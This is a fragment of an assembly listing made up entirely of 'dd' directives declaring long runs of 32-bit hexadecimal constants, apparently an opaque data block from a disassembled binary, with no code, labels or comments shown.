		dd 0A096DCDAh, 0BA7AA85Ah, 0EAF08FB2h, 0D3236909h, 77ABDCADh
		dd 87FBBCCDh, 90F56CE8h, 0D6FBBD90h, 70CDC1ACh,	0F0FC7018h
		dd 0AC5C837h, 0E72B4C42h, 0A905835Fh, 2AFFCFBCh, 4BEAD90Bh
		dd 0BBA4D95Ah, 0B1F41CBDh, 529D4A47h, 66B26629h, 2B36C675h
		dd 5FE895Fh, 0F3C3895Fh, 0C6C694D3h, 4AED078Ah,	0C3FDF324h
		dd 55F5A65Fh, 25893BF3h, 0B475258Ch, 8BCAAB12h,	107DEA12h
		dd 9733A96Ah, 8D785529h, 8EBB8D77h, 0ACFB6E4Bh,	9E2B6FB4h
		dd 79A91F1Dh, 0E4EAB2C5h
		dd 4E7FA1CEh, 58FD706Dh, 3D336C56h, 7411CFE9h, 0A52CB472h
		dd 62521C83h, 50C246ABh, 0DD8AA563h, 4EDA3512h,	0C165A25Dh
		dd 0BEAABF6Fh, 481D25DAh, 32F9860Eh, 8485C3B5h,	0B96F6449h
		dd 5EAA5F6Dh, 0D8C1F577h, 4ED93A6Ch, 0F6F809BBh, 750C6B4Bh
		dd 66C142BAh, 27814F81h, 0E48229D3h, 0CF06EB2Ah, 3E9442DFh
		dd 14D79D5Ah, 71549526h, 5FBAAA8Ch, 0D533C90Bh,	7919FAD4h
		dd 0C54CE9E0h, 0DEDA1A96h, 117D86D1h, 64182583h, 7073CE78h
		dd 1E8E2797h, 297C38F8h, 9B8D5BE3h, 0D6A810A9h,	1FF05154h
		dd 47DA3D25h, 59CE3C33h, 709F572Ah, 0C87E0F25h,	3868AE10h
		dd 0BB0736F7h, 46BB45B6h, 7FB0809Bh, 474DF47Ah,	3CF97C86h
		dd 0E85464BFh, 0C3EABE5Eh, 0F958D55h, 0ECA1F8B2h, 37DA9CAh
		dd 16F5F6E2h, 88EFCFA8h, 1230B3A0h, 0C0CDAC8h, 0F7EFBC27h
		dd 711A28D5h, 8FF3EBAAh, 5DB6BDA2h, 5BE2F2F7h, 1C6CB22Bh
		dd 5794F54h, 3C99043Fh,	7F1D5B6h, 561778AEh, 0C39312DFh
		dd 6059273Bh, 40B579FBh, 57A4D0F6h, 9BD78B82h, 706C41D7h
		dd 0C2720504h, 84439755h, 7FE0FF41h, 0C2BD41CDh, 434100FBh
		dd 0EB0BDEFCh, 0D73CA70Fh, 42EE0BAh, 68BDB0F1h,	9C0A41h
		dd 2555ABB6h, 8550BB96h, 0F35B4CA2h, 0DF56C667h, 75246830h
		dd 52B4AF5Bh, 5A8E22A1h, 0F564A71h, 0AE7512B4h,	0EACA66CBh
		dd 0E91C0606h, 0F471A90Bh, 3CB4DE17h, 366A22F2h, 9DB03C4Fh
		dd 2ACCB0EEh, 0DF57E5F8h, 0AE32817Bh, 5BA189F2h, 2699C260h
		dd 3874FBAEh, 5468133Ah, 41462576h, 3F41AE1h, 4DBBEE81h
		dd 31E2E601h, 0FCDDA8C6h, 2FB5C5B2h, 0F0B5B964h, 0CFB69DC0h
		dd 0D5AC15FCh, 3EDED1E4h, 0EF695E24h, 0CB3E19D9h, 74699C0Dh
		dd 448FE441h, 1D3E1738h, 0F05FB404h, 0A3D7261Eh, 0DA36FD3Dh
		dd 1B3E95A7h, 0D9B5E92Ah, 1F262087h, 0BE39EBABh, 57D2DF3h
		dd 8040115Ch, 0AC1DFFB9h, 8707B38h, 568D17F9h, 0BF4497B3h
		dd 1749E7D1h, 0C114EB75h, 0EAFC14AAh, 0B749BBCBh, 87E54C21h
		dd 48912D67h, 752AE5FEh, 1568D51Dh, 59DD845Ah, 5336DCD5h
		dd 0A981E953h, 3F5F6209h, 93FB3BA5h, 0BBF25618h, 7BFCE032h
		dd 0B47F1BC0h, 0C58C4BBh, 0E2BC7C27h, 2D5F927Ah, 6C952F20h
		dd 0B52B303Dh, 427B2310h, 14924EE3h, 14E64DE6h,	6B56DC17h
		dd 7990F14Dh, 0E23E8E1Fh, 0FDE4B6C8h, 7214FC68h, 0FB0E92EDh
		dd 92DA8B12h, 0F61808FAh, 94EF6A88h, 8BCADC4Eh,	0B39883E3h
		dd 5787F911h, 4D2F18F4h, 7C8BCFD0h, 0D3283D76h,	0EAE33D92h
		dd 142B57BAh, 0A52F6575h, 3EED21ACh, 2BB44FC6h,	21ECCACCh
		dd 0A67BF8D5h, 7496E89Ah, 283FA62Ah, 8BB527C4h,	6E453F6Ah
		dd 39FEC450h, 0FBA4D868h, 2D65F42Eh, 0A34969DCh, 9C5910D4h
		dd 6B232A59h, 65DBF53Eh, 91AC0FC0h, 0CD1E1E6Fh,	94310FCFh
		dd 0A0A6EBAAh, 1DF1DE37h, 90D62F9Ch, 4998A7BEh,	0AD1C5CDFh
		dd 4DEDFEF3h, 0B10ABDBBh, 0FD9F4BABh, 8D917420h, 87AD8A88h
		dd 368B849Eh, 41A55DB6h, 94A5E457h, 40771BF5h, 734F0CEFh
		dd 5236ECF4h, 9F291B8Ch, 0DD83E148h, 0AFCF7F52h, 0DCEB7933h
		dd 0D0F2BD0Eh, 3CB71848h, 0CBAFD81Fh, 7DFBE5D5h, 0CD61F14Ch
		dd 0B2D7DCFh, 6F76FEEBh, 0F6378F61h, 0DB679CAFh, 89AF9214h
		dd 50B2AABBh, 0B9647736h, 85E4AB17h, 0AF61B2Eh,	0CC2E0A7Dh
		dd 6122015Dh, 8EB3F61Ch, 0F4CAD81Fh, 8E6619DFh,	0D2192E33h
		dd 94BF8EB0h, 3CA218C0h, 644214EAh, 0A12AB12Eh,	7CD1F88h
		dd 3C837C67h, 1B891464h, 0E04DBDD7h, 1960A776h,	8E7E4FC1h
		dd 0B8143656h, 0F381BDD5h, 90A1CCC6h, 438F4115h, 53F8689Ch
		dd 54262C2Eh, 541550C3h, 0B9438E37h, 758B492Eh,	0B697F1D7h
		dd 0AA53030Eh, 502E7665h, 3225C418h, 5B2B0FB9h,	0B3F1697Ah
		dd 29251C05h, 0C74354F3h, 0E4571E3Dh, 1BA13F0Dh, 76EDDE9Ah
		dd 0CEE357Eh, 0D5E5BD02h, 0BF937BF2h, 18387833h, 0BB726A6Bh
		dd 0F13B5AE4h, 517F8943h, 93F6D536h, 9E15C9A0h,	0E162303Fh
		dd 18D94DF4h, 4145BA33h, 0D06D9E41h, 4775319Ch,	0C1F7FBBBh
		dd 6AA6DF59h, 0ABB84371h, 12DFFD78h, 0AA7318h, 4D26B8CFh
		dd 0DEB9E08Fh, 9E5B5B3h, 0CCD17503h, 71572FFBh,	0CD51700Bh
		dd 0FCF13E1Ah, 0DC3B3ACh, 0AD2E0B35h, 4CCD7F4Eh, 2741BB9Ch
		dd 1A70E394h, 2F387720h, 0D307C7Ah, 792BC74Eh, 0D295DED0h
		dd 0ACD36058h, 4B93C0FAh, 0AACB4B36h, 7DD6EE1Ah, 0A68B4B39h
		dd 0DBB28F75h, 22084758h, 0B5AE5806h, 621071FAh, 0E8D03FACh
		dd 5D5DE6Ch, 0D5017394h, 0ED27333Bh, 573FA985h,	0C6205AB7h
		dd 953D7416h, 0AE2EBD45h, 0C1D14724h, 0C4A970D3h, 0EF2AD6A0h
		dd 5908E7E1h, 76BCAA2Ch, 25A2E8A2h, 0F5400D97h,	26DCE3C1h
		dd 0B93BCB60h, 26EACED2h, 0E34C8C79h, 683AD381h, 5334E839h
		dd 98CAEBDEh, 0F6997452h, 0A6873474h, 4F6E1B9Ah, 0C0C37029h
		dd 8691C90Fh, 0D8807E0Eh, 0CD5084D8h, 1D16E383h, 31FB60B4h
		dd 5459FD94h, 37F20C3Dh, 7B03F8CDh, 0E923FD7Dh,	0F6BBCE92h
		dd 0A1434E76h, 0D2939AA0h, 76D1EE4Ch, 0D11F785Fh, 3F36BEACh
		dd 0C55C15EBh, 56BC7E91h, 476C63D2h, 298CB826h,	0D693EF21h
		dd 1748F3EDh, 7C2D4B51h, 776266CCh, 0D246142Ch,	0E62904F3h
		dd 5239EC9Ah, 0C8F50FF7h, 406F3E1Bh, 0AAD50CE0h, 43B7BFB4h
		dd 63B2498Ah, 47998E75h, 4938281h, 60F5771Ah, 0A07C5E4Eh
		dd 0CF138B93h, 6F45DE07h, 5C07DB51h, 5F8FFEFBh,	6C17527Eh
		dd 4B563B97h, 6DBF883Ah, 0BE6250BBh, 6C728719h,	0F1A9CC9h
		dd 0DAA592BEh, 45F21434h, 4351D946h, 1291F91Eh,	87A07749h
		dd 554CBF09h, 7955102Ah, 0A9919EDDh, 2B60AB6Eh,	8ABB2285h
		dd 3718AAE9h, 3A8F6D15h, 0E142C809h, 1E9D2133h,	87DBFF38h
		dd 34B972C3h, 5DE22F87h, 0E3338951h, 0FA3DAC8Eh, 665279Dh
		dd 2EF715FCh, 1A77D8C8h, 0D3C7D62Dh, 889CE35Dh,	0CE1A374Ch
		dd 367DAECh, 0BE9AF7B7h, 5E964D54h, 0BECE0BB7h,	11AC11CEh
		dd 18A06079h, 15D9CDD6h, 0D6EFC55Eh, 0DA3EB951h, 0D5E154ABh
		dd 0E32C9B1Bh, 96044DD2h, 0CC05E7B4h, 309CAB52h, 9CE59C7Eh
		dd 5D692EACh, 0BA87A31Fh, 6B7209ADh, 22AE7679h,	2FD7B8BFh
		dd 49D3C78Eh, 548F2203h, 0F6BE0D50h, 0EAEFB816h, 13371839h
		dd 0CF3319E3h, 40EDCAC8h, 0A5757678h, 8529B4DEh, 0A85FF3BBh
		dd 27C1CE94h, 0F77A62Fh, 3F62E544h, 105FB055h, 7FD4AD3Eh
		dd 761B4E97h, 8E7FD8C5h, 0AA5D93BEh, 0EED2E620h, 0F728D6CEh
		dd 0C3452127h, 598BE68Fh, 402BA650h, 6079EB28h,	0AD78C5A0h
		dd 0FE7FF09Bh, 56350BAh, 14A2BF07h, 8DAC874Bh, 0EBAFAC63h
		dd 978F3A85h, 0ADE2A4F8h, 0AF5BE39Ah, 53FBE531h, 0F8582560h
		dd 0F375E3C0h, 28401E0Dh, 6C1650D4h, 7B2AB422h,	5F9F18F9h
		dd 0E6BDAD3Ah, 0D712D0A4h, 0CCFE2332h, 8AEE42F3h, 7C71158Eh
		dd 35DEDF9Fh, 0B448ACB0h, 0B5382950h, 0D884DDEBh, 17190BF2h
		dd 4EEAA9F2h, 0DDAA5491h, 40B5F205h, 0E4A80625h, 0DAC63A00h
		dd 9E64A65Bh, 0F81441E3h, 0F9563FA5h, 75862B25h, 703FFB4Ch
		dd 956CA0F7h, 0DCBA79F6h, 0C743653Fh, 0EA041334h, 0D72F1DEBh
		dd 476454Eh, 4B88C8B2h,	0F18AF5BFh, 922CDA64h, 46D4B332h
		dd 0CFBF4CA6h, 2ED35F6h, 0FC6622Ah, 2A47A747h, 0DD9C64BFh
		dd 0E20C89B1h, 34A9C776h, 89488F5Fh, 6C13D264h,	15F05401h
		dd 5038DA75h, 0D5E3DA37h, 966BC2DFh, 606BB83Bh,	0DC123178h
		dd 0F7C51C77h, 24A3128Fh
		dd 4D07F638h, 0E1B2581Eh, 0CC6BF304h, 7A992854h, 0E2C7DF0Fh
		dd 9C12CB39h, 0D62D4333h, 0F1C3FC22h, 0F76A85F9h, 0E13A6E7Bh
		dd 0A6318FF4h, 9928B5BAh, 0A5A040AAh, 7FE8FC45h, 5F18FC0Bh
		dd 0B7CFC4A9h, 4D5E5501h, 0AA133616h, 17485B40h, 7D7F32EFh
		dd 0EE75A1A0h, 0B9BA2960h, 15A0574h, 7D6CDD63h,	0C0511E81h
		dd 0B87E1ECAh, 0EC70B5B2h, 529736F5h, 0FBD05E69h, 5E80CA44h
		dd 507EFC57h, 95C6DFFAh, 83C74A0Bh, 6B4DD117h, 986789B4h
		dd 18653494h, 6A780781h, 25C6C09Eh, 3D1A6D19h, 581580D5h
		dd 765896B9h, 0D7F964B7h, 14857E03h, 846D6FD9h,	0F1EC4AD9h
		dd 0DD77AFE1h, 0BB43CA14h, 0C7F3ADD9h, 1D6D3575h, 6EABDB6Ch
		dd 0C649DF2Dh, 0F6394835h, 0FF919CC0h, 28DABC6Dh, 0B8A17769h
		dd 9177CA85h, 0C2E22653h, 0E449BAA6h, 13D8BD5Fh, 0EF32364Bh
		dd 8A2A54D1h, 7752EF81h, 2E43C920h, 4C7B0DFEh, 0D1FAAC66h
		dd 0A6EDA522h, 6E9FEEFAh, 5FF10E5Ah, 4ED67B08h,	47D9DEEh
		dd 650EC02Bh, 0D0FDA052h, 0F3508B5Eh, 0FCAF6C77h, 6C6174A3h
		dd 72921D37h, 0C5EB2695h, 0B0FC5C02h, 0D4EA5422h, 8FED0CDAh
		dd 0FC4BA5A7h, 0D609240Eh, 49EC8A51h, 2FDE52A1h, 0EA814DD7h
		dd 97D4ECE5h, 9C759D52h, 63E2619Bh, 91411B8Dh, 0D6B5C65Fh
		dd 0D4AF89DBh, 59D3DB17h, 0D18D5099h, 8644F861h, 0DFAFA602h
		dd 89597131h, 327F455Fh, 86BFF9DAh, 84D95A34h, 5D860B5Dh
		dd 6F68D92h, 0CA37414Bh, 631A72D8h, 5F719D46h, 16E3E7A7h
		dd 0D584ADBEh, 0A6BB2AFDh, 0FC21AD15h, 0E1536955h, 783C3436h
		dd 0BF10E575h, 54EC68E2h, 0E919D715h, 9ABB2C52h, 0D1BA9BFCh
		dd 824711F3h, 35556E3Bh, 90FC51FAh, 59435862h, 64061CA1h
		dd 3AAE175Eh, 2A8F4508h, 0C64598F1h, 92C57D14h,	957CCA82h
		dd 0ED19C162h, 6E09C96Dh, 0ABDC0C8Bh, 562ADDACh, 1D544D39h
		dd 403F4D14h, 3ED4FA58h, 80503D04h, 0D75452F0h,	8DBCA8C2h
		dd 750E1520h, 383B3A8Eh, 1459AC5Ah, 0ADA5BF8Eh,	61260EDAh
		dd 3C8BA4A2h, 0E64783C9h, 0F0D55816h, 5B3BD1E0h, 0DFCF25C2h
		dd 3537A760h, 59C18DB9h, 0DA2407CAh, 0FB4A65B8h, 12BB2616h
		dd 0FE88EF56h, 1BC23799h, 0EBAA42EDh, 0E8A3B11Fh, 0B886C181h
		dd 8F586378h, 9B639D8Ah, 0DCF69D7Dh, 0E96AA92Bh, 9986D0BCh
		dd 0F8689760h, 4817FDE1h, 0C85C9EF4h, 95005CA1h, 75D7E145h
		dd 73335752h, 35999EA9h, 0A33E34C5h, 5FFDE7D0h,	0E2EB5A48h
		dd 0FA67556Ah, 3C52DAF3h, 0B6594A09h, 555E2034h, 0D6F52F5Ch
		dd 136ED325h, 0B7B24357h, 7D4AADAEh, 76ED3F87h,	0D02E3CE5h
		dd 933F064Bh, 0B4BD98B3h, 87F24CA4h, 7DE7F020h,	0BC4AC34Fh
		dd 1CC97851h, 7A3BB2BFh, 8554715Dh, 0AAEA1E82h,	748B0AD1h
		dd 698ABF77h, 22FB6A5Fh, 5B607205h, 6F0C685Dh, 6E376BC6h
		dd 0F0EFB645h, 1B352A89h, 51D7C83h, 9B8A4168h, 9756AC8Bh
		dd 8761B471h, 8AFF4468h, 0A8C39120h, 0F4ACD0CCh, 0C9E3B5CFh
		dd 863CC199h, 77F73697h, 0EA1F50DEh, 73524238h,	0F35665FEh
		dd 7074903Ah, 0BEE412B6h, 0AF6E38C5h, 6173FF51h, 5ECC66D7h
		dd 0ED029546h, 0F187F47Fh, 267F4A0Dh, 0CD53E3A2h, 0E8AE181Ah
		dd 16F9A5A7h, 0E03F1C55h, 246F9987h, 0F12D4B37h, 77079AC8h
		dd 54E78F9Fh, 4FEA838Ah, 0F1BE9B13h, 6F9D6E8Bh,	0A75578EFh
		dd 0C4DF406h, 341A345Ch, 88CEBB70h, 0E43CA6C7h,	0F93D40B4h
		dd 7B1C81F3h, 0EFC12149h, 8E948746h, 6348AEB4h,	982DEA45h
		dd 0BF24E74Eh, 11191D09h, 5A8BFC4Dh, 959F6627h,	4375B3B3h
		dd 120B4933h, 0B7E59BADh, 314C8E44h, 9465F181h,	0F4D24EABh
		dd 1DC82C78h, 0BE23B20Ch, 0DCEBFCBEh, 0CE55107Ah, 8B4A419Dh
		dd 0D8F0D530h, 56A5C6FDh, 493CA8DDh, 27D673F4h,	51BA2C32h
		dd 79FC43F8h, 0E528C143h, 0B542B7E5h, 7A5D6B33h, 7760A889h
		dd 0AAEDE1CAh, 0FEA3C9Bh, 0ADB4A3DAh, 249BF69h,	0EA984B3h
		dd 0EF49B8FEh, 62456F3Ah, 43E5C936h, 0C9BD2B4Eh, 95495F09h
		dd 9362A252h, 125CB0BAh, 2951DDA9h, 4E5A0FE2h, 0EF63CBA9h
		dd 0A88AAC1Ah, 296819E2h, 40E228Bh, 635CB1EEh, 0ADB5FFABh
		dd 9243EE46h, 0ED9E5694h, 0EABEF9CBh, 413A06FBh, 868EB6D5h
		dd 0F262CF17h, 0B68D8349h, 17ABE7F3h, 9648487Eh, 0C058FF50h
		dd 44CF85F1h, 3862C684h, 0F8B380A1h, 0B69E8031h, 0B3F498C2h
		dd 45D444B4h, 0EFF2AEB2h, 0F8552729h, 4557A768h, 0C0FCF8BBh
		dd 282B1974h, 5CA1EBFBh, 94F5E733h, 0F3F60BBDh,	9F99A278h
		dd 42C59FDFh, 0DAABD605h, 47093DDDh, 206937B7h,	0AA62BE53h
		dd 0B62CEFC5h, 0E73ED129h, 0C5F42225h, 0D6EAC409h, 219A470Dh
		dd 0C4CEFED6h, 389B2D69h, 659C9A15h, 0A22F1028h, 96BA6BBAh
		dd 6550BDCBh, 0E4AE3ABFh, 84F30AEDh, 0C61AAE2Fh, 0F0D5850Fh
		dd 0F2FA232h, 1828365Ch, 0FD11727Bh, 92CB05B9h,	5281CF7Eh
		dd 0BDCE665Dh, 239A9EEh, 0B125F05h, 9B6F57ABh, 4ADA848h
		dd 0A2976D72h, 0A6245335h, 8670587Dh, 581B8731h, 88F6B5D7h
		dd 1F2F4E07h, 702892DDh, 0E265F2ABh, 0FC6E2AB5h, 0CB9B3430h
		dd 0A3BECB2Ch, 0B6FC38B2h, 4BED2E17h, 7B9C779h,	319C58ADh
		dd 0CECE667Ch, 383C7F81h, 0A39DF968h, 0CBE198A5h, 0B6456CD4h
		dd 0CAEF88Bh, 0F4057C7Ah, 0CAAB976Ch, 1B775CECh, 0E1371076h
		dd 657981F1h, 1E935D5h,	56D922EBh, 0A55568D0h, 37DFF6Bh
		dd 4AE3772Fh, 2703AFDh,	0A81EABC4h, 717AE9FDh, 0C98985D6h
		dd 18F7DCD2h, 9DB8B57Ah, 8E372B86h, 9264E0A1h, 0AA5D368Bh
		dd 0E2F180E1h, 7AED24EEh, 0B36FB3DBh, 99DB4861h, 3507F4D7h
		dd 96EC9EE3h, 944DB5F3h, 29A371D7h, 8499BFDBh, 0CACA5FE9h
		dd 0B07D6D5Fh, 0BA66E7F8h, 0E0A01593h, 0FD8BD061h, 0D09AE34Fh
		dd 0BFC0FA21h, 0E91C279Ch, 3A4CF77Ah, 7A03B458h, 0EEAA8E31h
		dd 0E39A2087h, 0E9E88873h, 0C74163C8h, 0D67DAF74h, 0A17FFCF3h
		dd 0D44D11Eh, 0BB6BFED7h, 5D8952C2h, 0F429F8EFh, 5F1113F2h
		dd 8B7CE128h, 2522493Bh, 9A4BAE2Dh, 0D0E9D140h,	55B73A2Ah
		dd 94CE71E9h, 0D6D80CBFh, 9A74AEBFh, 5A88FD1Fh,	0B29C55D6h
		dd 0A3D53AB4h, 6996F855h, 27D681B5h, 2FCEE90Ch,	0E53D83C4h
		dd 4F14B970h, 0C4C24653h, 43FF356Ch, 2EB76DA3h,	0A28303D1h
		dd 0EA3D5D70h, 3BB51BD1h, 1FCF6CCBh, 0D3585ACAh, 0D105BCAEh
		dd 0BDAAFD42h, 0EB518E73h, 0E247FE6h, 59FA39C4h, 2A845BD5h
		dd 0AED83ADh, 0D79FD2F9h, 6D53B38Eh, 0C224EBEAh, 798D5597h
		dd 257CAA5Ch, 657985EEh, 82266E7Ch, 0D4CABCEEh,	0AF63F2B6h
		dd 52D358DDh, 0D5FF597Ch, 138520F2h, 4B94B083h,	0B32657F3h
		dd 2B3D9CAFh, 8709A7EEh, 9CFEC93Eh, 519EEF85h, 0D0AE8A0h
		dd 7DEA9ACAh, 94A262C0h, 85BEFC71h, 517FCC63h, 677AF959h
		dd 29E737F6h, 0E0B4F22Bh, 0ADCFF223h, 8E6E7E61h, 0DBDB255Bh
		dd 0B9BD21FBh, 75DDD8EFh, 332FD97h, 0BA8682D0h,	0CC041CFCh
		dd 0CE2FCA59h, 11A17FBCh, 2869FACBh, 0CC8CDA43h, 87E25055h
		dd 0C572FAAh, 1C948C60h, 0B068BE1Eh, 0ECDFD213h, 0FA586CA6h
		dd 0D701CE90h, 3A1B3498h, 3BB532A0h, 588FAA67h,	0D8B9610Bh
		dd 18454F03h, 0AB2F7739h, 627A6586h, 0FCC0E89h,	0F45316B6h
		dd 35553332h, 83C87017h, 954406F3h, 41AA73F3h, 672CBE97h
		dd 0E82E0AD7h, 0A665D0DAh, 0F68D0F88h, 0A72767A6h, 0E34245DFh
		dd 0EF88D89h, 0E8A647EAh, 8AC12CD5h, 157B4371h,	5788D9E5h
		dd 0D410447Ah, 0E89A89D7h
		dd 734CAFBAh, 32249028h, 714919BCh, 0F0F135F9h,	0C0C52F41h
		dd 0D6996B42h, 33145990h, 8C29802Eh, 89FA6E6Ch,	40AE2C8Eh
		dd 16E41475h, 0AF9E6027h, 0BB52A80Ah, 4B2F6568h, 26389B1Dh
		dd 0F6CE5438h, 0E4B0A44Fh, 4C7AF630h, 8A3512B4h, 97EE16CEh
		dd 2ECD8F04h, 3AEBB8A7h, 247E181Bh, 5EF4A98Ch, 0F3EABD03h
		dd 25FF1B9Dh, 56D5727Ah, 0AA62D1CAh, 877E643Ah,	0DA92167Fh
		dd 6D6DD860h, 0DE00B3ACh, 474CB107h, 15FBCAEFh,	5ACA4577h
		dd 2B47BB0Dh, 7EAEA9Bh,	250FA289h, 0B52B2A34h, 0C32F9B5Ah
		dd 273128D7h, 5A20B23Fh, 0BD9DC5ABh, 0A286948Ah, 5483A4B4h
		dd 3F3E04E3h, 0D1B71485h, 35CA854Ah, 3B0D8B49h,	17F508E6h
		dd 9BBA5193h, 76326767h, 738BA018h, 87E3136Dh, 0D982D5FDh
		dd 0CC0F8CDBh, 0A988B9D9h, 0A93F2FCFh, 4FF5D358h, 0E2AB98B4h
		dd 0C3FBC1D3h, 729A1851h, 5ECF025h, 0A95B62CAh,	726330CEh
		dd 0AE52A2E9h, 95C4D938h, 2B3820CDh, 0BD73B47Bh, 3539622Bh
		dd 0A475B383h, 6B4F87E1h, 4FF38559h, 529E60A8h,	58E1ABBh
		dd 0C227ADE0h, 0AA3A25D8h, 68D3E678h, 97F783C4h, 8BEFE112h
		dd 40E9171Eh, 26B2A63h,	0E669F63Ah, 922BECDBh, 0DA094C66h
		dd 5FE4AEAEh, 77B01F39h, 0CF468A07h, 4C83D8A8h,	0A2A2BA74h
		dd 9B47FCA4h, 37CB836Bh, 4BCD24FFh, 10588F8h, 6B1EF0E1h
		dd 16C9E493h, 35BC762Eh, 0D57657C1h, 9533F9DEh,	9776D1DBh
		dd 0BEB55AD6h, 0B47EFD23h, 12B06D18h, 0A5FE1FA3h, 0C477ABD5h
		dd 3155E842h, 8A01187h,	0FDF503D1h, 0F4FE43BFh,	58FAF738h
		dd 0E7079FF9h, 0FBF1909Eh, 0EEDDC712h, 639CBC9Bh, 0B8D2B014h
		dd 6E8A55DBh, 0F7B973Bh, 359EB460h, 0AE3869ADh,	78777BFCh
		dd 180C3C9Ch, 3FED58CCh, 9B723CB2h, 689BB5B8h, 90A6CE5Dh
		dd 155AD365h, 0BFDFA2CFh, 0D3497270h, 22F0F193h, 0CF80D883h
		dd 0C942FC16h, 0B8ADFF27h, 84ED5F99h, 72993A1Fh, 0F4463AE2h
		dd 0B12AA898h, 656CB49h, 5EA50F77h, 0AF10B8DAh,	614F6089h
		dd 7D6A6DBFh, 45FDF4A1h, 37D24F94h, 0A3D59FBCh,	165EDDCDh
		dd 1FAE2EDEh, 2FF91EC9h, 936349A7h, 0A3C7B91Ch,	0F2F25AC7h
		dd 2C3F3C46h, 3C5FCCD4h, 23C7BA3Ah, 0EB8A313h, 0FD1D66FAh
		dd 90EBF24Ah, 46E77707h, 0DA3F3E07h, 0B3A553A8h, 0FC284FE8h
		dd 0B61E6C2h, 0BB1C71A9h, 65AEC9D4h, 2AECC05Dh,	0EFCCB504h
		dd 0BDB17994h, 96B324DAh, 94DAD787h, 0F67DA489h, 6A91AF89h
		dd 93FE2FCAh, 6EBE3DB0h, 9348DDEEh, 89B9CC44h, 0FBA2BF3Ah
		dd 548386C8h, 0D134E1F4h, 1B9559E1h, 0B743DCB9h, 98E38D21h
		dd 0CAF8F1BDh, 0C5FDA7C0h, 0F3F042A6h, 7F6E95B8h, 0E4463B79h
		dd 36A348D7h, 17A32F8h,	0C4BA90BFh, 174D5324h, 0A2FF4C82h
		dd 1FB315ABh, 2CD8DE25h, 0C8BEDB2Fh, 64C2E783h,	9240440Dh
		dd 0DE8B7D80h, 29DACA79h, 14B92FB4h, 0D5AD5FB3h, 8B140985h
		dd 0B7221A3Eh, 2E276D05h, 0E1884BE6h, 244F6A65h, 7E62DE2Ah
		dd 0BE108323h, 84FE13F4h, 5813A323h, 12A48385h,	0CB4C9D69h
		dd 185D1F1Eh, 0FF4B7621h, 32D8004Ch, 1B1223CAh,	1DCEFA01h
		dd 0E240F77Eh, 0AA94FCEEh, 73E167FDh, 3611B3FCh, 7709D69Bh
		dd 5736A043h, 0C3FBAED4h, 0FFD81A27h, 474BF0A8h, 390FB2B7h
		dd 0B34BF563h, 0A6646324h, 41E6787Dh, 6A0CA5D2h, 0B996912h
		dd 0FC8618CDh, 2BBD9278h, 0BAA6FE13h, 0CE348652h, 0C59E01E3h
		dd 0D433BB0Dh, 3F4F08E5h, 8A045A70h, 0F5746252h, 83AA2611h
		dd 10E926EFh, 0A97E1CF3h, 96558297h, 0BD982D32h, 3AB3D55Ch
		dd 4AEF3C66h, 77A6107Ch, 0BE635155h, 0EE4D0ED9h, 0F91E3152h
		dd 0D89CE8A2h, 0DC35ACAFh, 0CF2CB272h, 0E22F4830h, 0EFB68227h
		dd 0D2B933E7h, 6B523A0Fh, 9BF65986h, 83103BFCh,	75C1EE64h
		dd 0EFF86689h, 0F38DA6CEh, 16E872B8h, 899DA65Dh, 0C3742E8Fh
		dd 16727435h, 0FE16EACCh, 0DA31645Ch, 6AFA37AFh, 0C4BE564Ah
		dd 5695C75Ah, 0AB3C9B03h, 0FB70B0F4h, 8697B945h, 0BE05BB46h
		dd 2BAAE6F8h, 0E55F6662h, 0BECFF997h, 0BE31B0B5h, 2D680784h
		dd 19C2C796h, 0B0EA277h, 18AC6CACh, 0F7AD24Ah, 0EAC7BEA3h
		dd 66450A58h, 8EB30D4Ch, 12ADFFF6h, 822CC15Ah, 59117C5Ch
		dd 726E4D15h, 35A1EA98h, 0FCD3E4FEh, 8C9A1C33h,	0AACCD39Fh
		dd 6BED1F60h, 61F7D5B3h, 0B303AAB4h, 3BEEF71Ah,	4BFCD70Fh
		dd 985BBAD1h, 7815EF53h, 0FEFDB2C2h, 88AFE6F6h,	0F89D9D63h
		dd 65044121h, 4FD2A56Dh, 0B43EB60h, 2D873E5Ch, 79159E9Dh
		dd 90DEE3AFh, 0B772FE0Ah, 3DBD88Bh, 0B229DC1Fh,	9B467D2Ah
		dd 0C3F26352h, 0E4235A61h, 0D3332E56h, 0B23725FBh, 0AE018E7Ch
		dd 0C65AC962h, 0AC0C591Ah, 0C5E32B9Bh, 0AF0A23EFh, 238750A7h
		dd 0A6914B2h, 2BB18C3Ah, 0ABECD09Dh, 9E98435Ch,	0D2A36534h
		dd 0E86CAE1Ch, 4C73D369h, 0F352C09Ch, 3A552ACDh, 5EE2CCAEh
		dd 1C300679h, 1CA50CB4h, 4BF339D9h, 46D81593h, 4BEED2C0h
		dd 0FEC1A82Ah, 0F0E06D92h, 0FE6CF179h, 0FA897D5Bh, 0ACE7CA90h
		dd 12E185D1h, 20C003A6h, 0D5B1D974h, 0CFF12B1Dh, 0E83E3873h
		dd 0D596616Eh, 6ECAA2B8h, 0F15E1747h, 1C2E1CE0h, 0BC736E6Eh
		dd 0F1151F81h, 0F7039075h, 34B2CEB6h, 0B11EEF92h, 1E633BC0h
		dd 475EF731h, 4082E103h, 0A4E7F3AFh, 0E679EDADh, 0F9DE46ABh
		dd 78FCAB2h, 5D7D490Eh,	0F160B6C8h, 6294EF8Bh, 0F32A8B18h
		dd 63FFBC65h, 0B2EB5046h, 98D7EFD5h, 0AB975AA0h, 0E3585BE5h
		dd 7D306594h, 53B5CB83h, 67D80731h, 1431B622h, 1DC41FC3h
		dd 366A63F4h, 0E7D4AE39h, 0CDF84F81h, 0E615E4BCh, 337B24E8h
		dd 0A52A957Eh, 575BFDB2h, 564B1AADh, 0BA9A5A48h, 0A17C8768h
		dd 0BCF2A5F1h, 0DF4FA9DAh, 9B4318FEh, 1530C168h, 0FBA36E3Ah
		dd 0F83A3367h, 0C8445061h, 0B03DEEB1h, 3FD2E2C1h, 5EA5AC15h
		dd 0F54A4BA7h, 8AAC50DCh, 6437FBECh, 0A307EB69h, 6ABCF39Eh
		dd 0C7F0AFF2h, 0A4FF7F96h, 8C502148h, 613603F9h, 2617336Ah
		dd 3A63738h, 6B5D9946h,	5ED7AB8Dh, 5450C88Dh, 5F4776F2h
		dd 28847497h, 7C1ED795h, 6C33FD34h, 47EF0440h, 916917E7h
		dd 0CA81B050h, 68FF02Eh, 57B4A9DFh, 0DDE1BA89h,	74E15F9h
		dd 0C3F06A48h, 0C657A1D2h, 0FA4778F1h, 31240A5Dh, 70EC255Fh
		dd 8F35E368h, 7E87D0A7h, 0F9A268BBh, 0DEB6DEF2h, 389217CEh
